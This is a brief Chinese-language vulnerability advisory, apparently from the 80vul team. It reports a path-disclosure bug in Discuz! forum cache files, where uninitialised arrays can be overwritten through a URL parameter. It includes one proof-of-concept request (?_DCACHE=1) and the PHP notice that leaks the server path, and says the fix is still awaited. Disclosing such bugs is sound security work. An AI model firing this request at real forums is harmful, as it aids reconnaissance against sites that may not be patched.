Discuz! 路径信息泄露 bug

author: 80vul-A
team:http://www.80vul.com

一 分析
目录\uc_client\data\cache\,\forumdata\cache等下面的文件里对如:

$_CACHE['settings'] = array (
  'accessemail' => '',
  'censoremail' => '',
  'censorusername' => '',
  'dateformat' => 'y-n-j',
  'doublee' => '1',
  'nextnotetime' => '0',
  'timeoffset' => '28800',
);


$_DCACHE['settings'] = array (
  'accessemail' => '',
  'adminipaccess' => '',
  'admode' => '1',
  'archiverstatus' => '1',
  'attachbanperiods' => '',
  'attachimgpost' => '1',

数组$_DCACHE,$_CACHE等没有初始化,其实dz的安全人员已经考虑到了这个问题,如在include\common.inc.php 

$_DCOOKIE = $_DSESSION = $_DCACHE = $_DPLUGIN = $advlist = array();

但是想对于独立的Discuz! cache file并没有初始化,当我们提交?_CACHE=1 或者_DCACHE=2 导致错误而暴露路径等信息.

二 利用

poc如:

http://www.80vul.com/bbs/forumdata/cache/cache_usergroups.php?_DCACHE=1

Notice: Array to string conversion in xxx\forumdata\cache\cache_usergroups.php on line 6


三 补丁[fix]

等待官方补丁.